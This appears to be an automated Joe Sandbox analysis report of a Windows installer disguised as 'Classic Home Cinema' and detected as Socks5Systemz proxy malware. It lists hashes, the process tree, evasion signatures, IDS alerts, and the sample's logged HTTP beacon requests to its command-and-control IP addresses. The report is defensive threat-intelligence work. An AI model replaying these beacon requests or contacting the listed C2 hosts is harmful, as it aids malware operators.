Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EQ5Vcf19u8.exe

Overview

General Information

Sample name:EQ5Vcf19u8.exe
renamed because original name is a hash value
Original sample name:9fbf70243a3e4aca45a6d0af87749833e506c5a3eacdbc449525bc5f62835ba6
Analysis ID:1579844
MD5:849f1e782aef6fc885225f115db43236
SHA1:2e790be949272e97d9fd71b7a6ea34140f08fb16
SHA256:9fbf70243a3e4aca45a6d0af87749833e506c5a3eacdbc449525bc5f62835ba6
Infos:

Detection

Socks5Systemz
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EQ5Vcf19u8.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\EQ5Vcf19u8.exe" MD5: 849F1E782AEF6FC885225F115DB43236)
    • EQ5Vcf19u8.tmp (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmp" /SL5="$20478,3086842,56832,C:\Users\user\Desktop\EQ5Vcf19u8.exe" MD5: BCF2F0322A00DC0DE9B0CAE39438B480)
      • classichomecinema.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe" -i MD5: 765448A33166E70D7C75392D7E8FC161)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\is-1OQ1J.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000002.00000002.3556027586.0000000002AE6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000002.00000000.1706052559.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000001.00000002.3556080703.0000000005DF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: classichomecinema.exe PID: 7640JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  2.0.classichomecinema.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T11:49:10.321846+010020287653Unknown Traffic192.168.2.449887188.119.66.185443TCP
                    2024-12-23T11:49:16.153824+010020287653Unknown Traffic192.168.2.449904188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-23T11:49:11.133576+010028032742Potentially Bad Traffic192.168.2.449887188.119.66.185443TCP
                    2024-12-23T11:49:16.849386+010028032742Potentially Bad Traffic192.168.2.449904188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\ClassicHomeCinema\ClassicHomeCinema.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeUnpacked PE file: 2.2.classichomecinema.exe.400000.0.unpack
                    Source: EQ5Vcf19u8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Classic Home Cinema_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-T75LM.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-E3J5R.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-T75LM.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-RQ64T.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-E3J5R.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.4:49893 -> 31.214.157.206:2024
                    Source: Joe Sandbox ViewIP Address: 31.214.157.206 31.214.157.206
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49887 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49887 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda3a2119db388a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73989d4da9c5b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AB2B95 WSASetLastError,WSARecv,WSASetLastError,select,2_2_00AB2B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda3a2119db388a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73989d4da9c5b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: EQ5Vcf19u8.tmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: EQ5Vcf19u8.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: EQ5Vcf19u8.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: EQ5Vcf19u8.exe, 00000000.00000003.1694370826.0000000002088000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1694235169.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: EQ5Vcf19u8.exe, 00000000.00000003.1694370826.0000000002088000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1694235169.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000000.1694958711.0000000000401000.00000020.00000001.01000000.00000004.sdmp, EQ5Vcf19u8.tmp.0.dr, is-G4VDT.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/a
                    Source: classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325
                    Source: classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946e44be43869e7c4
                    Source: classichomecinema.exe, 00000002.00000002.3556348800.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/j
                    Source: classichomecinema.exe, 00000002.00000002.3555336843.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: EQ5Vcf19u8.exe, 00000000.00000002.3555201992.0000000002081000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1693888335.0000000002300000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.exe, 00000000.00000003.1693955102.0000000002081000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000003.1695608267.0000000003100000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000002.3555541276.0000000002128000.00000004.00001000.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000002.3555255376.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQ5Vcf19u8.tmp, 00000001.00000003.1695670125.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
                    Source: is-RQ64T.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_9b1d124f-5
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\EQ5Vcf19u8.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004706A81_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004809F71_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004673A41_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00486BD01_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045F0C41_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0045B1741_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004694041_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_00487B301_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: 1_2_0048DF541_2_0048DF54
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_004010002_2_00401000
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_004067B72_2_004067B7
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609660FA2_2_609660FA
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6092114F2_2_6092114F
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6091F2C92_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096923E2_2_6096923E
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6093323D2_2_6093323D
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6095C3142_2_6095C314
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609503122_2_60950312
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094D33B2_2_6094D33B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6093B3682_2_6093B368
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096748C2_2_6096748C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6093F42E2_2_6093F42E
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609544702_2_60954470
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609615FA2_2_609615FA
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096A5EE2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096D6A42_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609606A82_2_609606A8
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609326542_2_60932654
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609556652_2_60955665
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094B7DB2_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6092F74D2_2_6092F74D
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609648072_2_60964807
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094E9BC2_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_609379292_2_60937929
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6093FAD62_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6096DAE82_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_6094DA3A2_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60936B272_2_60936B27
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60954CF62_2_60954CF6
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60950C6B2_2_60950C6B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60966DF12_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60963D352_2_60963D35
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60909E9C2_2_60909E9C
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60951E862_2_60951E86
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60912E0B2_2_60912E0B
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_60954FF82_2_60954FF8
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AEF21D2_2_00AEF21D
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AF00102_2_00AF0010
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AE94B32_2_00AE94B3
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AC70B02_2_00AC70B0
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ABE0792_2_00ABE079
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ACBAED2_2_00ACBAED
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ACD31F2_2_00ACD31F
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AD0DA42_2_00AD0DA4
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ACB5F92_2_00ACB5F9
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AD266D2_2_00AD266D
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00AC873A2_2_00AC873A
                    Source: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exeCode function: 2_2_00ACBF052_2_00ACBF05
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\ClassicHomeCinema\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-HVAF2.tmp\EQ5Vcf19u8.tmpCode function: String function: 00403400 appears 60 times
